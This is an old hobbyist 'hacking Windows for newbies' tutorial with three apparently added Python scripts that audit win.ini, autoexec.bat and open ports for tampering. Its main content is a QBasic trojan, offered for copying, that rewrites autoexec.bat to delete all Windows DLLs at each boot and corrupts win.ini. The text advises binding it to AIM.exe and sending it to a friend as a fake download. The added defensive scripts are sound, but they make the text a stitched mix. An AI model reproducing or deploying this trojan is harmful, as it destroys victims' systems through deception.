Hacking Windows for The Complete Newbie Part 2
By: SLIPStream (formerly known as Morbos or Dynamite)
Contact information located at the end of the file.

(Please note: Newbie is not meant to be used as a put-down. All great hackers were once newbies, so please don't get POed about the terminology!) :)

WARNING: This file contains some elements which are considered illegal in most countries, including the United States. The author assumes no responsibility for the actions of the reader after reading this file. The reader hereby understands that the file is for educational purposes ONLY. The author does not encourage illegal activity and cannot be held responsible for the reader's actions. If you agree to this, proceed in reading the file; otherwise, please exit now.

Ok. If you read Part 1 of this text file you should have no problem understanding this one. This file contains a lot of code, so you need some compilers. First of all, download these. They're good tools for you to have as a hacker:

- QBasic 4.5
- Dev-C++ (or use another C++ compiler)
- Cain and Abel Password cracker
- L0phtCrack
- AIM (AOL Instant Messenger)
- Java2 SDK
- NASM for Windows
- FileBinder

Once you have all this stuff you can get started. This file assumes that you have read the previous part (Part 1).

Section 1: H4X0R 3L337 73RM1N0L0GY (Hacker Eleet Terminology)

On the internet you're gonna meet a lot of hackers who claim to be "3L33T" (Eleet). I probably wouldn't take their word for it. Most of them are probably Script Kiddies (explained later). But who knows, maybe some of them are really 3L33T ;) Anyways, here is some hacker terminology that you should become familiar with:

Firewall: A piece of software designed to "harden the target".

"Hardening the Target": Old hacker saying: No computer is unbreakable. But the computer can be 'hardened' against attackers. This term is popular with security experts.

Router: A hardware device which stands as an intermediary between the computer and the internet.
Multiple computers can be attached to the same router. Normally used for networking; however, one computer can use its own router.

Programming: If you don't know this one by now then you probably should take a step back and read about it. A program is a set of instructions which tells the computer what to do.

TCP/IP: Transmission Control Protocol/Internet Protocol. Basically, this is the internet. There's more about this than I could possibly explain to you in one text file.

Grid: A computer network arranged in the form of a grid. Normally used by large corporations.

Node: Any single computer attached to a large network.

OS: Operating System. Explained later.

That's not the half of it. But it's enough to get you through this tutorial.

Section 2: I'm lost

I'm sure you probably are. Don't take too big a bite out of the computer world or you'll get completely lost. In the world of computers, things can get really hard, really fast. Assuming that you read the last part, let's get started.

CODING!!!!

As a hacker, you're going to be doing a lot of coding. Hacking isn't instant. It requires work and effort. Your first languages should be C, C++, Python, and if you're witty, QBasic. What??? QBasic??? You Newb! No. No matter what people say, QBasic still remains one of the most classic programming languages (not to mention the easiest and most effective). The only thing that is missing from the QBasic language is the ability to use the TCP/IP protocol from the programming console (apart from DOS access to the net commands).

Pretend you already know some programming (you should read some files on it). You need to know how to exploit! Exploiting is the act of finding a flaw on a computer system (or in a program or operating system), and using this flaw to break in to the selected system.
These exploits are usually created through the process of exploitation, shown below:

    Program or Operating  --------->  Decompile code
    System                                  |
        \  or                               |
         \                                 _\/
          \
           \-------->  See visible flaws  ------------>  Write code or perform
                                                          action to exploit flaw

In case that wasn't clear for you, here's an example: A computer hacker is looking at a list of his open ports to see how he can harden his computer when he notices that the NetBIOS port is left open. He does some research and discovers that this port is used for file and printer sharing. He asks around on some hacker BBSs, and finds out that not many Windows users know about this flaw, and do not password against it. So, he finds out how to connect to this port, and writes a simple batch file that exploits this flaw. Get it?

With this knowledge, you too can write exploit code. Let's start off with some pre-made exploits:

Windows.ini Flaws - Windows.ini (or on XP, win.ini) is a ticking time bomb waiting to explode. It contains code which controls the way Windows runs programs, shares files and folders, even what programs run under certain file extensions. Here is a piece of a win.ini file:

    ; for 16-bit app support

    part1
    [fonts]

    part2
    [extensions]

    part3
    [mci extensions]

    part4
    [files]

    part5
    [Mail]
    MAPI=1
    CMC=1
    CMCDLLNAME=mapi.dll
    CMCDLLNAME32=mapi32.dll
    MAPIX=1
    MAPIXVER=1.0.0.1
    OLEMessaging=1

    part6
    [MCI Extensions.BAK]
    aif=MPEGVideo
    aifc=MPEGVideo
    aiff=MPEGVideo
    asf=MPEGVideo2
    asx=MPEGVideo2
    au=MPEGVideo
    m1v=MPEGVideo
    m3u=MPEGVideo2
    mp2=MPEGVideo
    mp2v=MPEGVideo
    mp3=MPEGVideo2
    mpa=MPEGVideo
    mpe=MPEGVideo
    mpeg=MPEGVideo
    mpg=MPEGVideo
    mpv2=MPEGVideo
    snd=MPEGVideo
    wax=MPEGVideo2
    wm=MPEGVideo2
    wma=MPEGVideo2
    wmv=MPEGVideo2
    wmx=MPEGVideo2
    wvx=MPEGVideo2

    part7
    [WAOL]
    AppPath=E:\Program Files\America Online 9.0
    SharedPath=E:\Program Files\Common Files\AOLSHARE

Ok, let's break it down. Part 1, fonts. Absolutely nothing interesting here. Even if you could, it would be boring to exploit a user's fonts.
[extensions] - Normally, there would be something here, but apparently this computer is storing its extension library somewhere else.

[mail] - This computer seems to support the MAPI protocol. What's MAPI? No, it's not the old arcade game. MAPI is a mail protocol; it's kind of old, but still useful. Now, most mail is POP3 or SMTP.

[MCI Extensions.BAK] - Not much to exploit here. But you could mess with the user's file extensions. You could inject the code:

    exe=MPEGVideo

at the end of this section and it would force the computer to run its default MPEG video player (such as Windows Media Player) with it instead of executing the file.

[WAOL] - Apparently this user uses AOL. Hehe. AOL is very easy to exploit, as explained in the last part.

Well, not much can be exploited from here. BUT WAIT!!! There was a DLL file listed in part 5! Let's run a search.

    Searching for MAPI.DLL...
    There were 5 files found. Did you find what you wanted?

Let's take a look:

    sfmapi.dll
    MAPI.DLL
    HMMAPI.DLL
    HIPMAPI.DLL
    aimapi.dll

Let's look into the MAPI.DLL file... WHOAH!!! Tons of encrypted, boring code. Nothing to exploit here. What's that last thing I see on the list? aimapi.dll? Wait... That's not artificial intelligence MAPI... It's the AIM API!!!! What's that? An API is an application programming interface. An application programming interface is a big library used to code. It's so that they won't have to rewrite the code over and over again. Let's look inside... Nothing... Hmmm, wait! There's unencrypted code here!!! There is some code here. Take a look for yourself; it's located in C:\Program Files\AIM. The file's named aimapi.dll. Open it up and look at the code. Hmm. This is interesting. There's code, let's look.

    %BASE%\aim.exe

This is about the only real help in the file. Hmm... What does this mean? %BASE% must mean the default directory for AIM. Aim.exe, well, that's self-explanatory. This really isn't very much help. But, we can exploit this. Ok, first of all, let's write some code.
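If you want to check your own win.ini for the kind of tampering just walked through, here is an added example (editor's code, not from the original file and not from any of the tools it lists). It parses win.ini sections and flags three things the text describes: an executable extension handed to a media handler under an [MCI Extensions] section, a [Desktop] wallpaper that is not an image file, and a [WAOL] AppPath pointing at a startup script instead of a directory. The sample win.ini embedded in it is constructed for the demo; the section names are taken from the text.

```python
"""Audit a win.ini-style file for the kinds of tampering discussed above.

Added example: not code from the original text. The sample win.ini below is
constructed (section layout from the text, with the tampered entries the text
describes added in) so that every check has something to find.
"""
import re

EXEC_EXTENSIONS = {"exe", "com", "bat", "cmd", "pif", "scr"}
IMAGE_EXTENSIONS = {"bmp", "jpg", "jpeg", "gif", "png"}

# Constructed sample, not a real machine's win.ini.
SAMPLE_WIN_INI = """\
; for 16-bit app support
[fonts]
[extensions]
[mci extensions]
[files]
[Mail]
MAPI=1
CMCDLLNAME32=mapi32.dll
[MCI Extensions.BAK]
mpg=MPEGVideo
wmv=MPEGVideo2
exe=MPEGVideo
[WAOL]
AppPath=C:\\AUTOEXEC.BAT
SharedPath=E:\\Program Files\\Common Files\\AOLSHARE
[Desktop]
Wallpaper=C:\\WINDOWS\\SYS32x1.html
"""


def parse_ini(text):
    """Minimal INI parser: {section: [(key, value), ...]} in file order.
    Section names keep their case; lines starting with ';' are comments."""
    sections = {}
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        header = re.match(r"^\[(.+)\]$", line)
        if header:
            current = header.group(1)
            sections.setdefault(current, [])
        elif current is not None and "=" in line:
            key, _, value = line.partition("=")
            sections[current].append((key.strip(), value.strip()))
    return sections


def file_extension(path):
    """Extension of the last path component, lower-cased ('' if none)."""
    name = path.replace("\\", "/").rsplit("/", 1)[-1]
    return name.rsplit(".", 1)[-1].lower() if "." in name else ""


def audit_win_ini(text):
    """Return [(section, key, reason), ...] for entries that look tampered with."""
    findings = []
    for section, entries in parse_ini(text).items():
        name = section.lower()
        for key, value in entries:
            k = key.lower()
            if name.startswith("mci extensions") and k in EXEC_EXTENSIONS:
                findings.append((section, key, "executable extension handed to media handler " + value))
            elif name == "desktop" and k == "wallpaper" and file_extension(value) not in IMAGE_EXTENSIONS:
                findings.append((section, key, "wallpaper is not an image file: " + value))
            elif name == "waol" and k == "apppath" and file_extension(value) in ("bat", "exe", "com"):
                findings.append((section, key, "AppPath points at a program, not a directory: " + value))
    return findings


if __name__ == "__main__":
    for section, key, reason in audit_win_ini(SAMPLE_WIN_INI):
        print(f"[{section}] {key}: {reason}")
```

Point it at a real file with `audit_win_ini(open(r"C:\WINDOWS\win.ini").read())`; the legitimate media mappings (mpg, wmv and so on) pass, and only an executable extension in that section is reported.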
This one is going to be a bootup virus. What is a bootup virus? A bootup virus is simply a virus that executes during startup! Doi! ;) Ok, here we go. Open up your QBasic compiler and let's get started!

First of all we need to know how to make a boot virus. A real boot virus is one normally written in ASM, which writes itself to the boot sector of a computer, so that it will damage the hard disk or other drives during the boot process, virtually undetectable. This boot virus will be a simple batch file bound to an exe file. This program will be small enough to fit through a 56k dial-up line, but big enough to not arouse suspicion. The virus overwrites autoexec.bat (the file executed on startup), then writes its own code to it. This code is malicious, so it will greatly damage the victim's hard disk, but it will not completely destroy it. The effects are still reversible, but it will cause the target much frustration.

Ok, let's start by taking a look at autoexec.bat.

WARNING! This exploit will not work on Windows XP. Windows XP runs on the NTFS filesystem, not a FAT filesystem. This means that DOS must be emulated. XP runs its own startup sequence; however, it is not a bat file.

It should be located at C:\AUTOEXEC.BAT. Open it with Notepad or the Windows edit command. Now you can look at it and see what is executing on your computer startup.
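Reading autoexec.bat by eye is fine for a five-line file, but the same check can be automated. The following is an added example (editor's code, not from the original file): it reads an autoexec.bat-style script and reports lines that would do damage at every boot, namely wildcard deletes, a disk format, or a copy over one of the startup/configuration files. The sample script inside it is constructed and mirrors the effects the text describes, so the checks have something to find.

```python
"""Check an autoexec.bat-style startup script for commands that damage the
system at boot. Added example, not code from the original text. The sample
script below is constructed; it copies a dropped .ini over windows.ini and
deletes every DLL under the Windows directory, which is what the text's
'bootup virus' leaves behind in autoexec.bat."""

DELETE_COMMANDS = {"del", "erase", "deltree"}
COPY_COMMANDS = {"copy", "xcopy", "move"}
PROTECTED_FILES = {"windows.ini", "win.ini", "system.ini", "autoexec.bat", "config.sys"}

# Constructed sample; not copied from any real machine.
SAMPLE_AUTOEXEC = """\
@echo off
@cd\\
@cd\\windows
@copy sys20344.ini windows.ini
@cd\\
@del c:\\windows\\*.dll
"""


def split_command(raw):
    """Drop the '@' echo-suppression prefix, lower-case, split into words.
    Returns [] for blank lines and REM comments."""
    line = raw.strip().lstrip("@").strip().lower()
    parts = line.split()
    if not parts or parts[0] == "rem":
        return []
    return parts


def audit_autoexec(text):
    """Return [(line_no, line, reason), ...] for lines that look destructive."""
    findings = []
    for no, raw in enumerate(text.splitlines(), start=1):
        parts = split_command(raw)
        if not parts:
            continue
        cmd, args = parts[0], parts[1:]
        if cmd in DELETE_COMMANDS and any("*" in a or "?" in a for a in args):
            findings.append((no, raw, "wildcard delete runs at every boot"))
        elif cmd == "format":
            findings.append((no, raw, "disk format runs at every boot"))
        elif cmd in COPY_COMMANDS and args:
            # Only the file name of the destination matters for the check.
            target = args[-1].replace("\\", "/").rsplit("/", 1)[-1]
            if target in PROTECTED_FILES:
                findings.append((no, raw, "overwrites " + target + " at every boot"))
    return findings


if __name__ == "__main__":
    for no, line, reason in audit_autoexec(SAMPLE_AUTOEXEC):
        print(f"line {no}: {line!r} -> {reason}")
```

Run against the real file with `audit_autoexec(open(r"C:\AUTOEXEC.BAT").read())`. A normal autoexec.bat (PATH, SET, a mouse driver) produces no findings; the two lines the constructed sample flags are exactly the copy-over-windows.ini and the wildcard DLL delete.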
Ok, here's some QBasic code:

    '******Start Copying Here*******
    dim line1 as string
    dim line2 as string
    dim line3 as string
    dim line4 as string
    dim line5 as string
    dim win1 as string
    dim win2 as string
    dim win3 as string
    dim win4 as string
    dim win5 as string
    dim win6 as string
    dim win7 as string
    dim win8 as string
    dim background as string
    dim background1 as string
    win1 = "[fonts]"
    win2 = "[extensions]"
    win3 = "[mci extensions]"
    win4 = "[files]"
    win5 = "[MCI Extensions.BAK]"
    win6 = "[WAOL]"
    win7 = "AppPath=C:\AUTOEXEC.BAT"
    win8 = "SharedPath=E:\Program Files\Common Files\AOLSHARE"
    'Important stuff
    background = "[Desktop]"
    background1 = "Wallpaper=C:\WINDOWS\SYS32x1.html"
    html1 = "
    html4 = "
    YOU SUCK!"
    html2 = "You suck You suckYou suck You suck"
    html3 = "
    html5 = "
    html6 = "
    line = "@echo off"
    line1 = "@cd\"
    line2 = "@cd\windows"
    line3 = "@copy sys20344.ini windows.ini"
    line4 = "@cd\"
    line5 = "@del c:\windows\*.dll"
    shell "cd\"
    open "autoexec.bat" for output as #1
    open "c:\windows\sys20344.ini" for output as #2
    print #1, line
    print #1, line1
    print #1, line2
    print #1, line3
    print #1, line4
    print #1, line5
    close #1
    print #2, win1
    print #2, win2
    print #2, win3
    print #2, win4
    print #2, win5
    print #2, win6
    print #2, win7
    print #2, win8
    print #2, background
    print #2, background1
    close #2
    open "C:\WINDOWS\SYS32x1.html" for output as #3
    print #3, html1
    print #3, html4
    print #3, html2
    print #3, html3
    print #3, html5
    print #3, html6
    close #3
    '******* Stop Copying Here *******

Wooh... that took longer than it should have. Bind this to AIM.exe and send it to your friend over AIM. He/she will probably think that it is default because he sees the filename aim.exe in the download area. Once he downloads it, it will force the following effects:

- Background will change to black with the text "You suck" scrolling across the screen
- All .dll files will be destroyed (causing most programs to cease to function)
- Win.ini will be reset, causing loss in settings (big time dump)

And the best part about it is:

- Even when they fix all this, it will happen again on reboot!!! ;)

This concludes Section 2.

Section 3: Emerging from the Windows environment

Believe it or not, there is more out there than Windows. Most non-tech-savvy users are in awe and disbelief that there is any other operating system than Windows. But there is, and you should get one. Don't get me wrong, I don't HATE Windows. I just dislike it. Me, I'm a genuine DOS user. You should learn to use DOS too. 'Cause if you're a fast typer, you can get more done in DOS in an hour than you could in Windows in a week. But apart from these big corporate operating systems, there are more. Some of these include:

- Linux <- Popular
- BSD <- L337
- Floppy OS's <- I love em'!
- Mac <- Bleah...
There are thousands more. Some are even run by individuals! You need to first select your operating system. To get started, take a look at SuSE Linux and RedHat Linux. These are popular distributions and can be purchased for a small price, or downloaded for free from their websites. But if you're not ready to make the full jump to Linux and abandon Windows yet, take a look at some floppy distributions. The best out there is MuLinux. MuLinux is a full Linux operating system that fits on a single floppy disk. There is no risk since it runs completely from RAM. However, it can be 'cloned' to your hard disk, without changing your operating system. When you 'clone' MuLinux, it creates a directory called "c:\linux" and stores all of its files there. You can then boot into DOS and then load the Linux kernel without a floppy. But, if you don't like the command line, you can still download X11 (the X Windows file explorer) and run it with MuLinux. X Windows will run MuLinux as if it were a normal desktop operating system. Just think about it.

Section 4: TCP/IP, Getting much more technical

Ok, as discussed earlier, TCP/IP is Transmission Control Protocol/Internet Protocol. What is all this??? Basically, it is the internet. They are the protocols which make the internet what it is today. They control all connections on the internet, and run services which allow remote computers to connect. There are 65,500 possible ports which could be open on a computer; let's look at this more closely.

What is a port? A port is like a window or door on a house. It is an entrance, a gateway. Example: When you go to a website, that website is nothing but a computer, or a network of computers, with port 80 or 81 purposely left open. It's like a store opening up its front window so you can see what's for sale. That's about as well as I can explain it to you. Everything you do on the internet is through the use of these ports, be it downloading a file, playing a game, or paying your bills.
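The hacker in the Section 2 example was looking at a list of his own open ports to harden his machine. Here is an added example of that check (editor's code, not from the original file): it reads netstat-style output, keeps only the sockets that accept inbound traffic, names the well-known services, and marks the ones the text itself treats as doors worth closing on a home box, Telnet (clear-text remote login) and the NetBIOS/SMB file-sharing ports. The netstat lines are constructed in the layout of Windows `netstat -an`; the port table is a small subset of the IANA well-known assignments.

```python
"""Classify listening ports from netstat-style output: which 'doors' a machine
has open, and which ones a home Windows box rarely needs to leave open.
Added example, not code from the original text. The netstat lines below are
constructed; the service table is a small subset of IANA well-known ports."""

WELL_KNOWN = {
    21: "FTP", 23: "Telnet", 25: "SMTP", 80: "HTTP", 110: "POP3",
    137: "NetBIOS name", 138: "NetBIOS datagram", 139: "NetBIOS session",
    445: "SMB", 5190: "AIM",
}

# Ports whose exposure the text's NetBIOS example and Telnet discussion make a
# hardening concern, with the reason to report.
RISKY = {
    23: "clear-text remote login",
    137: "file and printer sharing reachable from the network",
    138: "file and printer sharing reachable from the network",
    139: "file and printer sharing reachable from the network",
    445: "file and printer sharing reachable from the network",
}

# Constructed sample in the layout of Windows 'netstat -an' output.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:23             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:80             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:139            0.0.0.0:0              LISTENING
  TCP    192.168.1.5:1034       64.12.24.7:5190        ESTABLISHED
  UDP    0.0.0.0:137            *:*
"""


def listening_ports(text):
    """Return sorted (proto, port) pairs that accept inbound traffic.
    TCP sockets count only in LISTENING state; a bound UDP socket always does."""
    found = set()
    for raw in text.splitlines():
        parts = raw.split()
        if len(parts) < 3 or parts[0] not in ("TCP", "UDP"):
            continue  # banner, header, blank lines
        proto, local = parts[0], parts[1]
        state = parts[3] if len(parts) > 3 else ""
        if proto == "TCP" and state != "LISTENING":
            continue  # established or outbound sessions are not open doors
        port = int(local.rsplit(":", 1)[1])
        found.add((proto, port))
    return sorted(found)


def hardening_report(text):
    """Return [(proto, port, service, concern_or_None), ...] for each open port."""
    return [(proto, port, WELL_KNOWN.get(port, "unknown"), RISKY.get(port))
            for proto, port in listening_ports(text)]


if __name__ == "__main__":
    for proto, port, service, concern in hardening_report(SAMPLE_NETSTAT):
        print(f"{proto} {port:>5} {service:<18} {concern or 'ok'}")
```

On a real machine, feed it the output of `netstat -an` (for example `hardening_report(subprocess.run(["netstat", "-an"], capture_output=True, text=True).stdout)`). The outbound AIM session in the sample is deliberately not reported: it is the machine's own connection, not a door anyone else can walk through.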
The most commonly used ports are:

- HTTP - Websites
- FTP - Downloads
- Telnet - Remote connection

Here's what a computer on the internet might look like (using the house analogy):

                Driveway
                __________
    ==========|          |
    ==========|  Garage  |
              |          |
               ----------
        ___|              |________
       |                           |
       |                           |
    -- Front          =       Back --
       Door           =       Door
       |                           |
       |___________________________|

Ok. How does this help me in understanding ports? You see the front door? That represents port 23, or Telnet. It is how you would normally access your computer remotely. The driveway represents your router. It's how you are connected to the rest of the internet. The garage represents the HTTP port, as if you were having a garage sale. Now the back door usually stays locked. But due to a recent break-in, it is left open. Here's your chance to strike.

What's a backdoor? A backdoor is a program left by a cracker to make sure that he/she has access to the system even after the passwords are changed.

Here's something new for you to try:

Click Start -> Run -> and type 'telnet sdf.lonestar.org' without the quotes
or ditto, and type 'telnet cyberspace.org' without the quotes

These shell accounts will help you get started with Unix.

That's all for now. Sorry I can't explain the whole TCP/IP protocol and Cisco networking standards to you now. Maybe I'll publish a guide on TCP/IP later on. The next tutorial should be coming out soon! Have phun! And don't get caught!

Contact information:

E-Mail:
blackfire@dangerous-minds.com <- please use this one
blackfire@phayze.com
morbos@white-star.com

For other information: slipstream_node@yahoo.com

Website: dataflux.cjb.net

My Email Service: Please request an account. I don't want to overload my disk quota. Please contact me to request an account. Unauthorized accounts will be deleted.
http://wwww.mysticism.zzn.net (username@mysticism.zzn.net)

Yahoo IM: SLIPStream_node